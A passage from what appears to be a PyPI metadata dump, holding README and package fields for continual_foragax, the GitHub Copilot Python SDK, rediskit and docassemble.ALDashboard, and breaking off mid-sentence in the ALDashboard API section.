`-v2` — hand-crafted small multi-biome layouts - `ForagaxWeather-v1` — small weather-driven two-biome environment used by examples The `make` factory accepts the following notable kwargs: - `observation_type`: one of `"object"`, `"rgb"`, or `"world"`. - `aperture_size`: integer or tuple controlling the agent's local observation aperture. - `file_index`: used to pick weather locations. ## Custom objects and extensions The codebase includes an object system for placing items into biomes and controlling behaviour (rewards, respawn / regen behavior, blocking/collectable flags). See `foragax.objects` for the canonical object definitions and helpers like `create_weather_objects` used by the registry. If you want to add new object classes, follow the examples in `foragax.objects` and add the class into registry configs or construct environments programmatically. ## Design notes - JAX-first: RNG keys and immutable env state are passed explicitly so environments can be stepped inside JIT/pmapped loops if desired. - Small, composable environment variants are provided through the registry (easy to add more). ## Examples - `examples/plot.py` — runs a short random policy in `ForagaxWeather-v1` and produces a temperature vs reward plot (saves to `plots/sample_plot.png`). - `examples/visualize.py` — runs environments at multiple aperture sizes and saves short videos under `videos/` using `save_video`. ## Development Run unit tests via pytest. ## Acknowledgments We acknowledge the data providers in the ECA&D project. Klein Tank, A.M.G. and Coauthors, 2002. Daily dataset of 20th-century surface air temperature and precipitation series for the European Climate Assessment. Int. J. of Climatol., 22, 1441-1453. Data and metadata available at https://www.ecad.eu
text/markdown
null
Steven Tang <stang5@ualberta.ca>
null
null
null
null
[]
[]
null
null
>=3.8
[]
[]
[]
[ "gymnax", "six; python_version < \"3.10\"" ]
[]
[]
[]
[]
uv/0.10.4 {"installer":{"name":"uv","version":"0.10.4","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true}
2026-02-19T22:03:04.792156
continual_foragax-0.49.0.tar.gz
7,737,744
b3/2a/b00da1d664cc6be62b9c289e932620d1da540f8f1082cdc255569f8abd43/continual_foragax-0.49.0.tar.gz
source
sdist
null
false
ee1174f3e383d85ba7af2883e1f4ae67
2149791bba8d67fa112d2731f0408d5a5310ed2daf1038f0537a4654a8fb6421
b32ab00da1d664cc6be62b9c289e932620d1da540f8f1082cdc255569f8abd43
null
[]
198
2.4
github-copilot-sdk
0.1.26rc0
Python SDK for GitHub Copilot CLI
# Copilot Python SDK Python SDK for programmatic control of GitHub Copilot CLI via JSON-RPC. > **Note:** This SDK is in technical preview and may change in breaking ways. ## Installation ```bash pip install -e ".[dev]" # or uv pip install -e ".[dev]" ``` ## Run the Sample Try the interactive chat sample (from the repo root): ```bash cd python/samples python chat.py ``` ## Quick Start ```python import asyncio from copilot import CopilotClient async def main(): # Create and start client client = CopilotClient() await client.start() # Create a session session = await client.create_session({"model": "gpt-5"}) # Wait for response using session.idle event done = asyncio.Event() def on_event(event): if event.type.value == "assistant.message": print(event.data.content) elif event.type.value == "session.idle": done.set() session.on(on_event) # Send a message and wait for completion await session.send({"prompt": "What is 2+2?"}) await done.wait() # Clean up await session.destroy() await client.stop() asyncio.run(main()) ``` ## Features - ✅ Full JSON-RPC protocol support - ✅ stdio and TCP transports - ✅ Real-time streaming events - ✅ Session history with `get_messages()` - ✅ Type hints throughout - ✅ Async/await native ## API Reference ### CopilotClient ```python client = CopilotClient({ "cli_path": "copilot", # Optional: path to CLI executable "cli_url": None, # Optional: URL of existing server (e.g., "localhost:8080") "log_level": "info", # Optional: log level (default: "info") "auto_start": True, # Optional: auto-start server (default: True) "auto_restart": True, # Optional: auto-restart on crash (default: True) }) await client.start() session = await client.create_session({"model": "gpt-5"}) def on_event(event): print(f"Event: {event['type']}") session.on(on_event) await session.send({"prompt": "Hello!"}) # ... wait for events ... await session.destroy() await client.stop() ``` **CopilotClient Options:** - `cli_path` (str): Path to CLI executable (default: "copilot" or `COPILOT_CLI_PATH` env var) - `cli_url` (str): URL of existing CLI server (e.g., `"localhost:8080"`, `"http://127.0.0.1:9000"`, or just `"8080"`). When provided, the client will not spawn a CLI process. - `cwd` (str): Working directory for CLI process - `port` (int): Server port for TCP mode (default: 0 for random) - `use_stdio` (bool): Use stdio transport instead of TCP (default: True) - `log_level` (str): Log level (default: "info") - `auto_start` (bool): Auto-start server on first use (default: True) - `auto_restart` (bool): Auto-restart on crash (default: True) - `github_token` (str): GitHub token for authentication. When provided, takes priority over other auth methods. - `use_logged_in_user` (bool): Whether to use logged-in user for authentication (default: True, but False when `github_token` is provided). Cannot be used with `cli_url`. **SessionConfig Options (for `create_session`):** - `model` (str): Model to use ("gpt-5", "claude-sonnet-4.5", etc.). **Required when using custom provider.** - `reasoning_effort` (str): Reasoning effort level for models that support it ("low", "medium", "high", "xhigh"). Use `list_models()` to check which models support this option. - `session_id` (str): Custom session ID - `tools` (list): Custom tools exposed to the CLI - `system_message` (dict): System message configuration - `streaming` (bool): Enable streaming delta events - `provider` (dict): Custom API provider configuration (BYOK). See [Custom Providers](#custom-providers) section. - `infinite_sessions` (dict): Automatic context compaction configuration - `on_user_input_request` (callable): Handler for user input requests from the agent (enables ask_user tool). See [User Input Requests](#user-input-requests) section. - `hooks` (dict): Hook handlers for session lifecycle events. See [Session Hooks](#session-hooks) section. **Session Lifecycle Methods:** ```python # Get the session currently displayed in TUI (TUI+server mode only) session_id = await client.get_foreground_session_id() # Request TUI to display a specific session (TUI+server mode only) await client.set_foreground_session_id("session-123") # Subscribe to all lifecycle events def on_lifecycle(event): print(f"{event.type}: {event.sessionId}") unsubscribe = client.on(on_lifecycle) # Subscribe to specific event type unsubscribe = client.on("session.foreground", lambda e: print(f"Foreground: {e.sessionId}")) # Later, to stop receiving events: unsubscribe() ``` **Lifecycle Event Types:** - `session.created` - A new session was created - `session.deleted` - A session was deleted - `session.updated` - A session was updated - `session.foreground` - A session became the foreground session in TUI - `session.background` - A session is no longer the foreground session ### Tools Define tools with automatic JSON schema generation using the `@define_tool` decorator and Pydantic models: ```python from pydantic import BaseModel, Field from copilot import CopilotClient, define_tool class LookupIssueParams(BaseModel): id: str = Field(description="Issue identifier") @define_tool(description="Fetch issue details from our tracker") async def lookup_issue(params: LookupIssueParams) -> str: issue = await fetch_issue(params.id) return issue.summary session = await client.create_session({ "model": "gpt-5", "tools": [lookup_issue], }) ``` > **Note:** When using `from __future__ import annotations`, define Pydantic models at module level (not inside functions). **Low-level API (without Pydantic):** For users who prefer manual schema definition: ```python from copilot import CopilotClient, Tool async def lookup_issue(invocation): issue_id = invocation["arguments"]["id"] issue = await fetch_issue(issue_id) return { "textResultForLlm": issue.summary, "resultType": "success", "sessionLog": f"Fetched issue {issue_id}", } session = await client.create_session({ "model": "gpt-5", "tools": [ Tool( name="lookup_issue", description="Fetch issue details from our tracker", parameters={ "type": "object", "properties": { "id": {"type": "string", "description": "Issue identifier"}, }, "required": ["id"], }, handler=lookup_issue, ) ], }) ``` The SDK automatically handles `tool.call`, executes your handler (sync or async), and responds with the final result when the tool completes. ## Image Support The SDK supports image attachments via the `attachments` parameter. You can attach images by providing their file path: ```python await session.send({ "prompt": "What's in this image?", "attachments": [ { "type": "file", "path": "/path/to/image.jpg", } ] }) ``` Supported image formats include JPG, PNG, GIF, and other common image types. The agent's `view` tool can also read images directly from the filesystem, so you can also ask questions like: ```python await session.send({"prompt": "What does the most recent jpg in this directory portray?"}) ``` ## Streaming Enable streaming to receive assistant response chunks as they're generated: ```python import asyncio from copilot import CopilotClient async def main(): client = CopilotClient() await client.start() session = await client.create_session({ "model": "gpt-5", "streaming": True }) # Use asyncio.Event to wait for completion done = asyncio.Event() def on_event(event): if event.type.value == "assistant.message_delta": # Streaming message chunk - print incrementally delta = event.data.delta_content or "" print(delta, end="", flush=True) elif event.type.value == "assistant.reasoning_delta": # Streaming reasoning chunk (if model supports reasoning) delta = event.data.delta_content or "" print(delta, end="", flush=True) elif event.type.value == "assistant.message": # Final message - complete content print("\n--- Final message ---") print(event.data.content) elif event.type.value == "assistant.reasoning": # Final reasoning content (if model supports reasoning) print("--- Reasoning ---") print(event.data.content) elif event.type.value == "session.idle": # Session finished processing done.set() session.on(on_event) await session.send({"prompt": "Tell me a short story"}) await done.wait() # Wait for streaming to complete await session.destroy() await client.stop() asyncio.run(main()) ``` When `streaming=True`: - `assistant.message_delta` events are sent with `delta_content` containing incremental text - `assistant.reasoning_delta` events are sent with `delta_content` for reasoning/chain-of-thought (model-dependent) - Accumulate `delta_content` values to build the full response progressively - The final `assistant.message` and `assistant.reasoning` events contain the complete content Note: `assistant.message` and `assistant.reasoning` (final events) are always sent regardless of streaming setting. ## Infinite Sessions By default, sessions use **infinite sessions** which automatically manage context window limits through background compaction and persist state to a workspace directory. ```python # Default: infinite sessions enabled with default thresholds session = await client.create_session({"model": "gpt-5"}) # Access the workspace path for checkpoints and files print(session.workspace_path) # => ~/.copilot/session-state/{session_id}/ # Custom thresholds session = await client.create_session({ "model": "gpt-5", "infinite_sessions": { "enabled": True, "background_compaction_threshold": 0.80, # Start compacting at 80% context usage "buffer_exhaustion_threshold": 0.95, # Block at 95% until compaction completes }, }) # Disable infinite sessions session = await client.create_session({ "model": "gpt-5", "infinite_sessions": {"enabled": False}, }) ``` When enabled, sessions emit compaction events: - `session.compaction_start` - Background compaction started - `session.compaction_complete` - Compaction finished (includes token counts) ## Custom Providers The SDK supports custom OpenAI-compatible API providers (BYOK - Bring Your Own Key), including local providers like Ollama. When using a custom provider, you must specify the `model` explicitly. **ProviderConfig fields:** - `type` (str): Provider type - `"openai"`, `"azure"`, or `"anthropic"` (default: `"openai"`) - `base_url` (str): API endpoint URL (required) - `api_key` (str): API key (optional for local providers like Ollama) - `bearer_token` (str): Bearer token for authentication (takes precedence over `api_key`) - `wire_api` (str): API format for OpenAI/Azure - `"completions"` or `"responses"` (default: `"completions"`) - `azure` (dict): Azure-specific options with `api_version` (default: `"2024-10-21"`) **Example with Ollama:** ```python session = await client.create_session({ "model": "deepseek-coder-v2:16b", # Required when using custom provider "provider": { "type": "openai", "base_url": "http://localhost:11434/v1", # Ollama endpoint # api_key not required for Ollama }, }) await session.send({"prompt": "Hello!"}) ``` **Example with custom OpenAI-compatible API:** ```python import os session = await client.create_session({ "model": "gpt-4", "provider": { "type": "openai", "base_url": "https://my-api.example.com/v1", "api_key": os.environ["MY_API_KEY"], }, }) ``` **Example with Azure OpenAI:** ```python import os session = await client.create_session({ "model": "gpt-4", "provider": { "type": "azure", # Must be "azure" for Azure endpoints, NOT "openai" "base_url": "https://my-resource.openai.azure.com", # Just the host, no path "api_key": os.environ["AZURE_OPENAI_KEY"], "azure": { "api_version": "2024-10-21", }, }, }) ``` > **Important notes:** > - When using a custom provider, the `model` parameter is **required**. The SDK will throw an error if no model is specified. > - For Azure OpenAI endpoints (`*.openai.azure.com`), you **must** use `type: "azure"`, not `type: "openai"`. > - The `base_url` should be just the host (e.g., `https://my-resource.openai.azure.com`). Do **not** include `/openai/v1` in the URL - the SDK handles path construction automatically. ## User Input Requests Enable the agent to ask questions to the user using the `ask_user` tool by providing an `on_user_input_request` handler: ```python async def handle_user_input(request, invocation): # request["question"] - The question to ask # request.get("choices") - Optional list of choices for multiple choice # request.get("allowFreeform", True) - Whether freeform input is allowed print(f"Agent asks: {request['question']}") if request.get("choices"): print(f"Choices: {', '.join(request['choices'])}") # Return the user's response return { "answer": "User's answer here", "wasFreeform": True, # Whether the answer was freeform (not from choices) } session = await client.create_session({ "model": "gpt-5", "on_user_input_request": handle_user_input, }) ``` ## Session Hooks Hook into session lifecycle events by providing handlers in the `hooks` configuration: ```python async def on_pre_tool_use(input, invocation): print(f"About to run tool: {input['toolName']}") # Return permission decision and optionally modify args return { "permissionDecision": "allow", # "allow", "deny", or "ask" "modifiedArgs": input.get("toolArgs"), # Optionally modify tool arguments "additionalContext": "Extra context for the model", } async def on_post_tool_use(input, invocation): print(f"Tool {input['toolName']} completed") return { "additionalContext": "Post-execution notes", } async def on_user_prompt_submitted(input, invocation): print(f"User prompt: {input['prompt']}") return { "modifiedPrompt": input["prompt"], # Optionally modify the prompt } async def on_session_start(input, invocation): print(f"Session started from: {input['source']}") # "startup", "resume", "new" return { "additionalContext": "Session initialization context", } async def on_session_end(input, invocation): print(f"Session ended: {input['reason']}") async def on_error_occurred(input, invocation): print(f"Error in {input['errorContext']}: {input['error']}") return { "errorHandling": "retry", # "retry", "skip", or "abort" } session = await client.create_session({ "model": "gpt-5", "hooks": { "on_pre_tool_use": on_pre_tool_use, "on_post_tool_use": on_post_tool_use, "on_user_prompt_submitted": on_user_prompt_submitted, "on_session_start": on_session_start, "on_session_end": on_session_end, "on_error_occurred": on_error_occurred, }, }) ``` **Available hooks:** - `on_pre_tool_use` - Intercept tool calls before execution. Can allow/deny or modify arguments. - `on_post_tool_use` - Process tool results after execution. Can modify results or add context. - `on_user_prompt_submitted` - Intercept user prompts. Can modify the prompt before processing. - `on_session_start` - Run logic when a session starts or resumes. - `on_session_end` - Cleanup or logging when session ends. - `on_error_occurred` - Handle errors with retry/skip/abort strategies. ## Requirements - Python 3.9+ - GitHub Copilot CLI installed and accessible
text/markdown
null
GitHub <opensource@github.com>
null
null
GitHub Copilot CLI License 1. License Grant Subject to the terms of this License, GitHub grants you a non‑exclusive, non‑transferable, royalty‑free license to install and run copies of the GitHub Copilot CLI (the “Software”). Subject to Section 2 below, GitHub also grants you the right to reproduce and redistribute unmodified copies of the Software as part of an application or service. 2. Redistribution Rights and Conditions You may reproduce and redistribute the Software only in accordance with all of the following conditions: The Software is distributed only in unmodified form; The Software is redistributed solely as part of an application or service that provides material functionality beyond the Software itself; The Software is not distributed on a standalone basis or as a primary product; You include a copy of this License and retain all applicable copyright, trademark, and attribution notices; and Your application or service is licensed independently of the Software. Nothing in this License restricts your choice of license for your application or service, including distribution under an open source license. This License applies solely to the Software and does not modify or supersede the license terms governing your application or its source code. 3. Scope Limitations This License does not grant you the right to: Modify, adapt, translate, or create derivative works of the Software; Redistribute the Software except as expressly permitted in Section 2; Remove, alter, or obscure any proprietary notices included in the Software; or Use GitHub trademarks, logos, or branding except as necessary to identify the Software. 4. Reservation of Rights GitHub and its licensors retain all right, title, and interest in and to the Software. All rights not expressly granted by this License are reserved. 5. Disclaimer of Warranty THE SOFTWARE IS PROVIDED “AS IS,” WITHOUT WARRANTY OF ANY KIND, EXPRESS, IMPLIED, OR STATUTORY, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON‑INFRINGEMENT. THE ENTIRE RISK ARISING OUT OF USE OF THE SOFTWARE REMAINS WITH YOU. 6. Limitation of Liability TO THE MAXIMUM EXTENT PERMITTED BY LAW, IN NO EVENT SHALL GITHUB OR ITS LICENSORS BE LIABLE FOR ANY DAMAGES ARISING OUT OF OR RELATING TO THIS LICENSE OR THE USE OR DISTRIBUTION OF THE SOFTWARE, WHETHER IN CONTRACT, TORT, OR OTHERWISE. 7. Termination This License terminates automatically if you fail to comply with its terms. Upon termination, you must cease all use and distribution of the Software. 8. Notice Regarding GitHub Services (Informational Only) Use of the Software may require access to GitHub services and is subject to the applicable GitHub Terms of Service and GitHub Copilot terms. This License governs only rights related to the Software and does not grant any rights to access or use GitHub services.
null
[ "Development Status :: 3 - Alpha", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: P...
[]
null
null
>=3.9
[]
[]
[]
[ "python-dateutil>=2.9.0.post0", "pydantic>=2.0", "typing-extensions>=4.0.0", "ruff>=0.1.0; extra == \"dev\"", "ty>=0.0.2; extra == \"dev\"", "pytest>=7.0.0; extra == \"dev\"", "pytest-asyncio>=0.21.0; extra == \"dev\"", "pytest-timeout>=2.0.0; extra == \"dev\"", "httpx>=0.24.0; extra == \"dev\"" ]
[]
[]
[]
[ "Homepage, https://github.com/github/copilot-sdk", "Repository, https://github.com/github/copilot-sdk" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:01:13.994462
github_copilot_sdk-0.1.26rc0-py3-none-win_arm64.whl
51,623,667
2d/a3/273dd246b16b39a7b5ae2a49fe017d96b25b50ee0226cd493092817f1528/github_copilot_sdk-0.1.26rc0-py3-none-win_arm64.whl
py3
bdist_wheel
null
false
2b70e82c1126011ef1d7d900ab3ef9a7
a44f812e1fd496fc023c1e0a99d08f4e53e49eba1e54582505d90df45848d6e7
2da3273dd246b16b39a7b5ae2a49fe017d96b25b50ee0226cd493092817f1528
null
[]
1,582
2.4
rediskit
0.0.36
A comprehensive Redis toolkit for Python with caching, memoization, and utilities
# rediskit A Python toolkit that provides Redis-backed performance and concurrency primitives for applications. It enables developers to add caching, distributed coordination, and data protection to their Python applications with minimal effort. ## Still work in progress Many features are still under development, there will be many breaking changes. Please use at your own risk. ## Features - **Function Result Caching**: Use the `@RedisMemoize` decorator to cache expensive function calls with automatic serialization, compression, and encryption - **Distributed Coordination**: Redis-based distributed locks and semaphores for coordinating access across multiple processes/machines - **Data Protection**: Multi-version encryption keys with automatic key rotation for sensitive cached data - **Async Support**: Full support for both synchronous and asynchronous applications - **Flexible Storage**: Choose between string or hash-based Redis storage patterns - **Modern Type Hints**: Full type safety with Python 3.12+ syntax ## Installation ```bash uv add rediskit # or poetry add rediskit ``` ## Quick Start ### Basic Setup ```python from rediskit import redis_memoize, init_redis_connection_pool # Initialize Redis connection pool (call once at app startup) init_redis_connection_pool() # Cache expensive function results @redis_memoize(memoize_key="expensive_calc", ttl=300) def expensive_calculation(tenantId: str, value: int) -> dict: # Simulate expensive computation import time time.sleep(2) return {"result": value * 42} # Usage result = expensive_calculation("tenant1", 10) # Takes 2 seconds result = expensive_calculation("tenant1", 10) # Returns instantly from cache ``` ### Custom Redis Connection ```python import redis from rediskit import redis_memoize # Use your own Redis connection my_redis = redis.Redis(host='my-redis-host', port=6379, db=1) @redis_memoize( memoize_key="custom_calc", ttl=600, connection=my_redis ) def my_function(tenantId: str, data: dict) -> dict: return {"processed": data} ``` ### Advanced Caching Options ```python from rediskit import redis_memoize # Hash-based storage with encryption @redis_memoize( memoize_key=lambda tenantId, user_id: f"user_profile:{tenantId}:{user_id}", ttl=3600, storage_type="hash", # Store in Redis hash for efficient field access enable_encryption=True, # Encrypt sensitive data cache_type="zipJson" # JSON serialization with compression ) def get_user_profile(tenantId: str, user_id: str) -> dict: # Fetch user data from database return {"user_id": user_id, "name": "John Doe", "email": "john@example.com"} # Dynamic TTL and cache bypass @redis_memoize( memoize_key="dynamic_data", ttl=lambda tenantId, priority: 3600 if priority == "high" else 300, bypass_cache=lambda tenantId, force_refresh: force_refresh ) def get_dynamic_data(tenantId: str, priority: str, force_refresh: bool = False) -> dict: return {"data": "fresh_data", "priority": priority} ``` ### Async Support ```python import asyncio from rediskit import redis_memoize, init_async_redis_connection_pool # Initialize async Redis connection pool await init_async_redis_connection_pool() @redis_memoize(memoize_key="async_calc", ttl=300) async def async_expensive_function(tenantId: str, value: int) -> dict: await asyncio.sleep(1) # Simulate async work return {"async_result": value * 100} # Usage result = await async_expensive_function("tenant1", 5) ``` ### Distributed Locking ```python from rediskit import get_redis_mutex_lock, get_async_redis_mutex_lock # Synchronous distributed lock with get_redis_mutex_lock("critical_section", expire=30) as lock: # Only one process can execute this block at a time perform_critical_operation() # Async distributed lock async with get_async_redis_mutex_lock("async_critical_section", expire=30) as lock: await perform_async_critical_operation() ``` ### Encryption Management ```python from rediskit import Encrypter # Generate new encryption keys encrypter = Encrypter() new_key = encrypter.generate_new_hex_key() # Encrypt/decrypt data manually encrypted = encrypter.encrypt("sensitive data", useZstd=True) decrypted = encrypter.decrypt(encrypted) ``` ## Configuration Configure rediskit using environment variables: ```bash # Redis connection settings export REDISKIT_REDIS_HOST="localhost" export REDISKIT_REDIS_PORT="6379" export REDISKIT_REDIS_PASSWORD="" # Encryption keys (base64-encoded JSON) export REDISKIT_ENCRYPTION_SECRET="eyJfX2VuY192MSI6ICI0MGViODJlNWJhNTJiNmQ4..." # Cache settings export REDISKIT_REDIS_TOP_NODE="my_app_cache" export REDISKIT_REDIS_SKIP_CACHING="false" ``` ## API Reference ### Core Decorators #### `@RedisMemoize` Cache function results in Redis with configurable options. **Parameters:** - `memoizeKey`: Cache key (string or callable) - `ttl`: Time to live in seconds (int, callable, or None) - `bypassCache`: Skip cache lookup (bool or callable) - `cacheType`: Serialization method ("zipJson" or "zipPickled") - `resetTtlUponRead`: Refresh TTL when reading from cache - `enableEncryption`: Encrypt cached data - `storageType`: Redis storage pattern ("string" or "hash") - `connection`: Custom Redis connection (optional) ### Connection Management - `init_redis_connection_pool()`: Initialize sync Redis connection pool - `init_async_redis_connection_pool()`: Initialize async Redis connection pool - `get_redis_connection()`: Get sync Redis connection - `get_async_redis_connection()`: Get async Redis connection ### Distributed Locking - `GetRedisMutexLock(name, expire, auto_renewal, id)`: Get sync distributed lock - `GetAsyncRedisMutexLock(name, expire, auto_renewal)`: Get async distributed lock ### Encryption - `Encrypter(keyHexDict)`: Encryption/decryption with key versioning ## Requirements - Python 3.12+ - Redis server - Dependencies: redis, redis-lock, nacl, zstd ## License Apache-2.0 license
text/markdown
null
Badr Elfarri <badr.elfarri@gmail.com>
null
Badr Elfarri <badr.elfarri@gmail.com>
Apache-2.0
redis, cache, memoization, toolkit, async
[ "Development Status :: 3 - Alpha", "Intended Audience :: Developers", "License :: OSI Approved :: Apache Software License", "Programming Language :: Python :: 3" ]
[]
null
null
>=3.12
[]
[]
[]
[ "pynacl", "redis", "python-redis-lock", "zstd", "httpx", "dotenv" ]
[]
[]
[]
[ "Homepage, https://github.com/badrelfarri/rediskit", "Documentation, https://github.com/badrelfarri/rediskit#readme", "Repository, https://github.com/badrelfarri/rediskit", "Bug Tracker, https://github.com/badrelfarri/rediskit/issues", "Changelog, https://github.com/badrelfarri/rediskit/blob/main/CHANGELOG....
twine/6.1.0 CPython/3.13.7
2026-02-19T22:00:56.030084
rediskit-0.0.36.tar.gz
59,239
e3/30/9eda599ee7f1d003ac77fc7cb501752d2767b5ff3d870e980e043aaf851b/rediskit-0.0.36.tar.gz
source
sdist
null
false
3dd216b7cf218c7e88108b4f19944f6e
4c9c8beaadcf4729f94e7c33dd675efa3f4e96392cf57f1af8674a5363e0b590
e3309eda599ee7f1d003ac77fc7cb501752d2767b5ff3d870e980e043aaf851b
null
[ "LICENSE" ]
204
2.4
docassemble.ALDashboard
1.1.1
Dashboard for some admin tasks
# ALDashboard: a docassemble Admin and Configuration Tool [![PyPI version](https://badge.fury.io/py/docassemble.ALDashboard.svg)](https://badge.fury.io/py/docassemble.ALDashboard) A single tool and interview to centralize some tedious Docassemble admin configuration tasks. ![A screenshot of the ALDashboard menu with choices: "Admin only - manage users", "Admin only - stats", "Install assembly line", "Verify API Keys", "Install packages", "update packages", "Package scanner", "View Answer files", "generate review screen draft", "validate docx template", "validation translation files", "prepare translation files", "validate an attachment fields block", "PDF tools", and "Compile Bootstrap theme"](https://github.com/SuffolkLITLab/docassemble-ALDashboard/assets/6252212/29539eec-3891-476b-b248-dd3db986d899) 1. Install the Document Assembly Line packages (support files for [Court Forms Online](https://courtformsonline.org)) 1. Searchable user management - reset passwords and change privileges. 1. Installing or updating several packages at once. 1. Listing and viewing the contents of an (unencrypted) interview to facilitate debugging errors on production servers. 1. View analytics/stats captured with `store_variable_snapshot`. 1. List the files inside a particular package installed on the server. 1. Gather files from a user who left the organization/unknown username and password. 1. Review screen generator 1. validate DOCX Jinja2 templates 1. Generate a [custom bootstrap theme](https://suffolklitlab.org/docassemble-AssemblyLine-documentation/docs/customization/overview#creating-a-custom-theme-from-source-instead-of-with-a-theme-generator) for your interviews. Ideas: 1. Add a link to the dispatch directive for an existing file in an existing package. 1. Generate translation files [TBD]. ## Use To use, you must create a docassemble API key and add it to your configuration, like this: `install packages api key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx` If you want the ALDashboard to be a dropdown option for admins and developers, add the following to the configuration before your `install packages api key`: administrative interviews: - interview: docassemble.ALDashboard:data/questions/menu.yml title: Dashboard required privileges: - admin - developer ## ALDashboard API When installed on a docassemble server, ALDashboard exposes a Flask API at: - `POST /al/api/v1/dashboard/translation` - `POST /al/api/v1/dashboard/docx/auto-label` - `POST /al/api/v1/dashboard/docx/runs` - `POST /al/api/v1/dashboard/docx/relabel` - `POST /al/api/v1/dashboard/bootstrap/compile` - `POST /al/api/v1/dashboard/translation/validate` - `POST /al/api/v1/dashboard/review-screen/draft` - `POST /al/api/v1/dashboard/docx/validate` - `POST /al/api/v1/dashboard/yaml/check` - `POST /al/api/v1/dashboard/yaml/reformat` - `POST /al/api/v1/dashboard/pdf/label-fields` - `POST /al/api/v1/dashboard/pdf/fields/detect` - `POST /al/api/v1/dashboard/pdf/fields/relabel` - `GET /al/api/v1/dashboard/jobs/{job_id}` - `GET /al/api/v1/dashboard/jobs/{job_id}/download` - `DELETE /al/api/v1/dashboard/jobs/{job_id}` - `GET /al/api/v1/dashboard/openapi.json` - `GET /al/api/v1/dashboard/docs` The API uses docassemble API key authentication via `api_verify()`. Endpoints default to synchronous execution and support `mode=async` (or `async=true`) for Celery-backed processing. To enable async mode, add this module to your docassemble configuration: ```yaml celery modules: - docassemble.ALDashboard.api_dashboard_worker ``` ### Endpoint Notes - `POST /al/api/v1/dashboard/translation` - Input: `interview_path`, one or more target languages (`tr_langs`), optional GPT settings. - Output: translation XLSX metadata and optional base64 file content. - `POST /al/api/v1/dashboard/docx/auto-label` - Input: DOCX file upload, optional `custom_people_names`. - Uses `docassemble.ALToolbox.llms` for OpenAI configuration. - Optional per-request overrides: `openai_api`, `openai_base_url`, `openai_model`. - Prompt customization: `custom_prompt`, `additional_instructions`. - Optional output budget override: `max_output_tokens`. - Output: `results` array by default; include `include_labeled_docx_base64=true` to also get updated DOCX bytes. - `POST /al/api/v1/dashboard/docx/runs` - Input: DOCX file upload (or base64 content). - Output: parsed run list as `results`, each entry `[paragraph_index, run_index, run_text]`. - Traversal includes body paragraphs, tables, headers, and footers. - `POST /al/api/v1/dashboard/docx/relabel` - Input: existing `results` from first-pass label run and/or DOCX upload. - Supports index-based edits: `replace_labels_by_index`, `skip_label_indexes`. - Supports explicit additions: `add_labels`. - Supports range-based rule additions: `add_label_rules` (paragraph range + match conditions). - Output: edited `results` array by default; include `include_labeled_docx_base64=true` to also get updated DOCX bytes. - In async mode, download binary file output from `GET /al/api/v1/dashboard/jobs/{job_id}/download`. - `POST /al/api/v1/dashboard/bootstrap/compile` - Input: SCSS upload or `scss_text`. - Output: compiled CSS text or base64. - Operational notes: - Requires `node` and `npm` available on server `PATH`. - First run downloads Bootstrap source into `/tmp` and runs `npm install`/`npm run css-compile`, so it may be noticeably slower. - Requires outbound HTTPS access to fetch Bootstrap and npm dependencies. - Writes temporary build artifacts under `/tmp`; ensure adequate disk space and cleanup policies. - `POST /al/api/v1/dashboard/translation/validate` - Input: translation XLSX. - Output: structured errors/warnings/empty rows. - `POST /al/api/v1/dashboard/review-screen/draft` - Input: one or more YAML files. - Output: generated review-screen YAML draft. - `POST /al/api/v1/dashboard/docx/validate` - Input: one or more DOCX templates. - Output: per-file Jinja rendering errors. - `POST /al/api/v1/dashboard/yaml/check` - Input: `yaml_text` (or `yaml_content`) and optional `filename`. - Output: structured DAYamlChecker issues with `errors`, `warnings`, and `valid`. - `POST /al/api/v1/dashboard/yaml/reformat` - Input: `yaml_text` (or `yaml_content`), optional `line_length` and `convert_indent_4_to_2`. - Output: reformatted YAML in `formatted_yaml` and `changed` boolean. - `POST /al/api/v1/dashboard/pdf/label-fields` - Input: PDF upload. - Output: PDF with fields detected and optionally relabeled (backward-compatible alias of `/pdf/fields/detect`). - `POST /al/api/v1/dashboard/pdf/fields/detect` - Input: PDF upload. - Optional flags: `relabel_with_ai`, `include_pdf_base64`, `include_parse_stats`. - Optional exact-name list: `target_field_names` (ordered list to apply after detection). - Output: PDF with detected fields added, plus optional AI/target-name relabeling. - `POST /al/api/v1/dashboard/pdf/fields/relabel` - Input: PDF with existing fields. - Relabel modes: `field_name_mapping` (exact old->new map), ordered `target_field_names`, or AI (`relabel_with_ai=true`). - Output: Relabeled PDF and resulting field names; optional parse stats/base64 output. - `GET /al/api/v1/dashboard/jobs/{job_id}/download` - Streams the first available file artifact from a completed async job. - Optional query parameters: - `index` (0-based artifact index) - `field` (exact artifact field path from JSON result) Live docs: - `GET /al/api/v1/dashboard/openapi.json` - `GET /al/api/v1/dashboard/docs` ## MCP Bridge API ALDashboard also exposes a lightweight MCP-style discovery layer over HTTP: - `POST /al/api/v1/mcp` (JSON-RPC 2.0 endpoint) - `GET /al/api/v1/mcp` (endpoint metadata) - `GET /al/api/v1/mcp/tools` (convenience tool listing) - `GET /al/api/v1/mcp/docs` (human-readable docs) Supported JSON-RPC methods: - `initialize` - `ping` - `tools/list` - `tools/call` `tools/list` discovers tools generated from: - ALDashboard REST OpenAPI paths (`/al/api/v1/dashboard/...`) - ALWeaver REST paths (`/al/api/v1/weaver...`) only when `docassemble.ALWeaver` is installed. For development-only fallback discovery from a local checkout, set: ```bash export ALDASHBOARD_MCP_DEV_MODE=true export ALWEAVER_REPO_PATH=~/docassemble-ALWeaver ``` Example: ```bash curl -X POST "https://YOURSERVER/al/api/v1/mcp" \ -H "Content-Type: application/json" \ -H "X-API-Key: YOUR_API_KEY" \ -d '{"jsonrpc":"2.0","id":1,"method":"tools/list","params":{}}' ``` Tool execution example: ```bash curl -X POST "https://YOURSERVER/al/api/v1/mcp" \ -H "Content-Type: application/json" \ -H "X-API-Key: YOUR_API_KEY" \ -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"aldashboard.get_al_api_v1_dashboard_openapi_json","arguments":{}}}' ``` `tools/call` securely 